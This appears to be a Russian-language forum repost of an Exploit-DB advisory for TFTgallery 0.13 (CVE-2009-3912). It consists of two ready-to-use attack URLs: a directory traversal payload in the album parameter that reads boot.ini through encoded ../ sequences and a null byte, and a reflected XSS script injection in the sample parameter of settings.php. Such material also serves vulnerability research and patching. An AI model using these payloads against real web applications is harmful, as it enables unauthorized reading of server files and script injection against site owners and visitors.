Exploit TFTgallery .13 - Directory Traversal

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
9854
Проверка EDB
  1. Пройдено
Автор
BLAKE
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-3912
Дата публикации
2009-11-02
Код:
Released information about the album parameter being vulnerable to XSS
earlier. Seems there are other similar issues:

The album parameter is vulnerable to directory transversal

http://example.com/tftgallery/index.php?album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&page=1<http://192.168.1.130/tftgallery/index.php?album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&page=1>

The sample parameter is vulnerable to XSS

http://example.com/tftgallery/settings.php?sample='></link><script>alert('blake
XSS test')</script>&name=cucumber%20cool
<http://192.168.1.130/tftgallery/settings.php?sample=>
 
Источник
www.exploit-db.com

Похожие темы